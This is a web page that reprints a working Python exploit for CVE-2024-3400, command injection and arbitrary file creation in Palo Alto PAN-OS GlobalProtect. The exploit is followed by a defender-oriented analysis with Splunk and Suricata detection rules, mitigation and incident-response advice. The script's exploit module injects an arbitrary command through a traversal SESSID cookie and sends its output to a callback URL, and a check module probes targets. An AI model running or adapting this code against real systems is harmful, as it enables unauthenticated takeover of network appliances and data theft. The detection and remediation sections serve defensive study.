Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation

Exploit Author: Kr0ff | Analysis Author: www.bubbleslearn.ir | Category: Remote | Language: Python | Published Date: 2024-04-21
# Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation
# Date: 21 Apr 2024
# Exploit Author: Kr0ff
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
# Software Link: -
# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 
#          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
# Tested on: Debian
# CVE : CVE-2024-3400

#!/usr/bin/env python3

import sys

try:
    import argparse
    import requests
except ImportError:
    print("Missing dependencies, either requests or argparse not installed")
    sys.exit(2)

# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis 
# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

def check_vuln(target: str, file: str) -> bool:
    """Probe `target` for the CVE-2024-3400 arbitrary-file-creation condition.

    Sends a POST to /ssl-vpn/hipreport.esp whose SESSID cookie is a path
    traversal ending in `file` under the portal images directory, then GETs
    /global-protect/portal/images/{file} without any cookie.  A 200 on the
    POST followed by a 403 on the GET is treated as confirmation that the
    appliance created the file; "Target vulnerable to CVE-2024-3400" is
    printed and True is returned.  Every other outcome returns False.

    Args:
        target: hostname or URL; an http:// and then https:// scheme is
            prepended when "https://" is not already present.
        file: filename placed in the traversal cookie and fetched back.

    Returns:
        True when the 200-then-403 sequence was observed, otherwise False.

    Raises:
        SystemExit: exit status 1 when the HTTPS POST raises
            requests.exceptions.Timeout.

    Defender note: the two requests below (a POST carrying a SESSID cookie
    with "../" sequences, then a cookie-less GET to the images path) are the
    exact sequence the detection queries later on this page look for.
    """
    ret = False
    
    uri = "/ssl-vpn/hipreport.esp"
    
    s = requests.Session()
    r = ""
    
    # Request headers for the POST; the Cookie value is the traversal string
    # that detection rules key on.
    headers = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": \
                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
    } 
    
    # Same User-Agent, no Cookie: used for the follow-up GET of the file.
    headers_noCookie = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
    }
    
    # Evaluates as (not "http://") or (not ("https://" in target)), i.e. this
    # branch runs whenever "https://" is absent from target: plain HTTP is
    # tried first, then HTTPS.
    if not "http://" or not "https://" in target:
        target = "http://" + target   
        try:
            # TLS certificate verification is disabled on every request.
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

        print("Trying with \"HTTPS\"...")

        target = "https://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    # A 200 on the POST alone proves nothing; the file's existence is inferred
    # from the portal answering 403 (rather than 404) for the images path.
    if r.status_code == 200:
        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
        if r.status_code == 403:
            print("Target vulnerable to CVE-2024-3400")
            ret = True
    else:
        return ret

    return ret
    
    

def cmdexec(target: str, callback_url: str, payload: str) -> bool:
    """Send the CVE-2024-3400 command-injection request to `target`.

    Issues one POST to /ssl-vpn/hipreport.esp whose SESSID cookie traverses
    into /opt/panlogs/tmp/device_telemetry/minute/ and wraps `callback_url`
    and `payload` in shell command-substitution syntax.  `payload` is
    interpolated into the cookie verbatim.  Any effect is observed out of
    band at `callback_url`; this function only reports whether the literal
    string "Success" appeared in the HTTP response body.

    Args:
        target: hostname or URL; an http:// and then https:// scheme is
            prepended when "https://" is not already present.
        callback_url: URL embedded in the cookie.
        payload: command string embedded in the cookie.

    Returns:
        True when "Success" is found in the response text, otherwise False.

    Raises:
        SystemExit: exit status 1 when the HTTPS POST raises
            requests.exceptions.Timeout.

    Defender note: the Cookie value built here (traversal plus backtick and
    "$(" characters) is the indicator the Suricata and Splunk examples on
    this page match on.
    """
    ret = False
    p = ""

    if " " in payload:
        p = payload.replace(" ", "${IFS)")

    uri = "/ssl-vpn/hipreport.esp"

    # Request headers; the Cookie value carries both the traversal path and
    # the shell metacharacters.
    headers = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": \
                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"

            } 

    s = requests.Session()
    r = ""
    
    # Evaluates as (not "http://") or (not ("https://" in target)), i.e. this
    # branch runs whenever "https://" is absent from target: plain HTTP is
    # tried first, then HTTPS.
    if not "http://" or not "https://" in target:
        target = "http://" + target   
        try:
            # TLS certificate verification is disabled on every request.
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

        print("Trying with \"HTTPS\"...")

        target = "https://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    # Only the response body is inspected; the status code is not checked.
    if not "Success" in r.text:
        return ret

    else:
        ret = True

    return ret

# Initialize the argument parser and dispatch on the chosen subcommand
def argparser(selection: list[str] | None = None) -> None:
    """Build the CLI, parse arguments and dispatch to check_vuln or cmdexec.

    Two subcommands are defined: "exploit" (-t/--target, -p/--payload,
    -c/--callbackurl, all required) and "check" (-t/--target, -f/--filename,
    both required).

    Args:
        selection: argument list for the first parse_args call.  Its result
            is immediately overwritten by a second parse_args call that
            re-reads sys.argv (substituting ["-h"], which prints usage and
            exits, when no arguments were given), so `selection` has no
            effect on which module runs.

    Returns:
        None.  The boolean results of check_vuln/cmdexec are discarded.

    Raises:
        SystemExit: from argparse on usage errors or -h.
    """
    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )
    
    subparser = parser.add_subparsers( help="Available modules", dest="module")
    
    exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
    #---------------------------------------
    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )

    # First parse uses `selection`; the second replaces it from sys.argv.
    args = parser.parse_args(selection)
    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])
    
    if args.module == "exploit":    
        cmdexec(args.target, args.callbackurl, args.payload)

    if args.module == "check":
        check_vuln(args.target, args.filename)

# Script entry point: run the CLI dispatcher, then report completion
# regardless of whether the selected module returned True or False.
if __name__ == "__main__":
    argparser()
    print("Finished !")


Palo Alto PAN-OS (< v11.1.2-h3) — CVE-2024-3400: Command Injection and Arbitrary File Creation

Executive summary

CVE-2024-3400 is a command injection and arbitrary file creation vulnerability affecting several PAN-OS releases that expose the GlobalProtect/SSL-VPN portal. An unauthenticated or partially authenticated request to the SSL-VPN endpoint can be crafted in a way that causes the appliance to write attacker-controlled content and, in some cases, execute system commands. Successful exploitation can lead to remote command execution, persistence, and information disclosure on affected devices.

Why this matters

  • Network security appliances are high-value targets: they sit in the trust path and often carry elevated access to logs, credentials, and network flows.
  • Command injection on a PAN-OS device can lead to long-term compromise, lateral movement, and bypass of monitoring that relies on the appliance.
  • Many organizations expose GlobalProtect/SSL-VPN portals for remote access, increasing attack surface if not hardened or patched.

Affected versions (vendor advisory basis)

Major branch | Affected releases
PAN-OS 11.1 | All releases prior to 11.1.0-h3, 11.1.1-h1, and 11.1.2-h3
PAN-OS 11.0 | Releases prior to 11.0.0-h3, 11.0.1-h4, 11.0.2-h4, 11.0.3-h10, 11.0.4-h1
PAN-OS 10.2 | Releases prior to 10.2.0-h3, 10.2.1-h2, 10.2.2-h5, 10.2.3-h13, 10.2.4-h16, 10.2.5-h6, 10.2.6-h3, 10.2.7-h8, 10.2.8-h3, 10.2.9-h1

References

Technical overview (high-level)

The vulnerability resides in the handling of SSL-VPN portal requests (GlobalProtect web endpoint). Specifically, inadequate sanitization or improper handling of user-supplied header values and session identifiers can cause path traversal and shell-interpretable content to be written to locations the system subsequently processes. That combination can allow an attacker to cause arbitrary files to be created by the appliance and, in certain exploitation paths, to trigger command execution on the underlying OS.

This is a type of web application injection + insecure file write: attackers abuse normal web requests to create files in privileged locations or inject command-bearing strings that are executed by some internal process or cron-type mechanism.

Potential impact

  • Remote code execution on the PAN-OS appliance
  • Arbitrary file creation that could be used for persistence or to exfiltrate data
  • Compromise of administrative credentials or cryptographic material stored on the appliance
  • Network interception or alteration if the appliance’s packet-processing or logging pipelines are tampered with

Detection: what to look for

Detection should focus on the abused endpoint, unexpected file writes, and unusual header values in HTTP(S) requests to the GlobalProtect portal. Important signals include POSTs to the SSL-VPN hipreport endpoint, Cookie headers whose SESSID value contains path traversal (../) or shell metacharacters, a 200 response to such a POST followed by a 403 on an unauthenticated GET for the same filename under the portal images path (the sequence the check routine in the script above relies on), and newly created files in the appliance logging or temporary directories.

Splunk example: find suspicious POSTs to the GlobalProtect portal


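(index=web_proxy OR index=web_access)
(("ssl-vpn/hipreport.esp" OR "/ssl-vpn/hipreport.esp") AND method=POST)
| search http_cookie="*SESSID=*"
| where match(http_cookie, "[\`\$\(\\\)]") OR match(http_cookie, "\.\./")
| table _time, src_ip, dest_ip, http_user_agent, http_cookie, http_status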

Explanation: This query looks for POST requests to the GlobalProtect hipreport endpoint, returns relevant headers, and filters for Cookie headers that contain potential shell metacharacters (` or $() ) or path traversal sequences (../). Adjust indexes and field names for your environment.

Suricata/IDS rule example (detection-focused)


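alert http any any -> any any (msg:"PAN-OS CVE-2024-3400 - suspicious GlobalProtect POST"; \
flow:established,to_server; \
http.uri; content:"/ssl-vpn/hipreport.esp"; nocase; \
http.header; content:"SESSID="; \
pcre:"/SESSID=.*(\.\.\/|`|\$\(.*\))/"; \
sid:1000001; rev:2;)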

Explanation: This Suricata rule alerts on HTTP requests to the hipreport.esp endpoint whose Cookie header carries a SESSID value containing path traversal or shell metacharacters. It is intentionally generic to reduce false negatives; tune the regex to cut noise in production, and confirm the rule loads with `suricata -T` on your release before deploying, since keyword syntax (sticky buffers such as `http.header` versus legacy content modifiers such as `http_header`) differs between Suricata versions.

Appliance log and filesystem checks (safe, non-destructive)


# Check the PAN-OS version via management CLI (safe)
> show system info | match sw-version

# Grep management or webserver logs for the endpoint (example)
> grep -i "hipreport.esp" /var/log/* 2>/dev/null

Explanation: The first command retrieves the installed software version for comparison with the vendor advisory. The second line is a POSIX-shell grep rather than a PAN-OS management-CLI command; the management CLI has its own syntax for searching logs, and log paths and filenames vary by PAN-OS version and support settings, so adapt the look-up to your release. Both are read-only checks.

Mitigation and remediation

  • Apply vendor patches immediately. The primary remediation is to upgrade PAN-OS to a non-affected release as provided in Palo Alto Networks’ advisory. Plan upgrades according to your maintenance windows and follow vendor guidance for hotfix deployment.
  • Restrict access to the SSL-VPN/GlobalProtect portal. Limit management and portal access to trusted source IPs via firewall rules, MFA, and zero-trust segmentation.
  • Harden exposure: If the portal is not required externally, disable external access or move it behind an authenticated reverse proxy or VPN with additional inspection.
  • Network controls: Use web application firewall (WAF) signatures or IDS rules to block requests that exhibit path traversal or contain shell metacharacters in headers or cookies.
  • Auditing and monitoring: Increase logging level around GlobalProtect endpoints temporarily and monitor for indicators described in the Detection section.
  • Rotate secrets: If a device is suspected to be compromised, rotate credentials, keys, and any certificates that may have been exposed or accessible.

Short-term workarounds when patching is delayed

  • Restrict access to the GlobalProtect portal to known IPs only.
  • Block or filter HTTP(S) requests containing suspicious Cookie values at the perimeter (WAF/IDS).
  • Disable or temporarily remove the portal if business operations allow.

Incident response guidance

  • Immediately isolate affected appliances from management networks until integrity is confirmed.
  • Collect volatile evidence: current processes, open network connections, and running cron jobs.
  • Preserve logs and create full backups of appliance configs for forensic analysis.
  • Search for arbitrary files and unexpected scripts in temporary directories and logging locations — in particular the directories the published proof of concept above writes to via the SESSID cookie, `/var/appweb/sslvpndocs/global-protect/portal/images/` and `/opt/panlogs/tmp/device_telemetry/minute/` (be cautious — changes to a live appliance can affect operations).
  • If compromise is suspected, follow a full containment-and-eradication plan: rebuild or reimage appliances from known-good software, restore configurations from trusted backups, and rotate credentials.

Safe testing and validation

Do not perform exploit attempts against production appliances. If you need to validate whether your environment is vulnerable, perform checks in an isolated lab or maintenance window, and preferably use vendor-provided proof-of-fix tests or consult Palo Alto Networks TAC for validation. Use the benign detection queries above to identify indicators without generating malicious requests.

Practical recommendations for operators

  • Maintain an inventory of PAN-OS devices and their versions; use automated tools or configuration management databases for continuous visibility.
  • Subscribe to vendor advisories and patch notifications to reduce time-to-patch.
  • Implement in-line detection (WAF/IDS) that inspects headers and cookie values for suspicious patterns.
  • Adopt least-privilege administrative practices and multi-factor authentication for device management.
  • Plan for appliance recovery: keep versioned backups and ensure configuration backups are securely stored off-device.

Timeline and disclosure

Follow Palo Alto Networks’ advisory for official timeline, CVE details, and fixed releases. Public analysis and writeups provide additional context; use them to enhance detection and incident response playbooks, but rely on the vendor for official remediation guidance.

Further reading and vendor advisory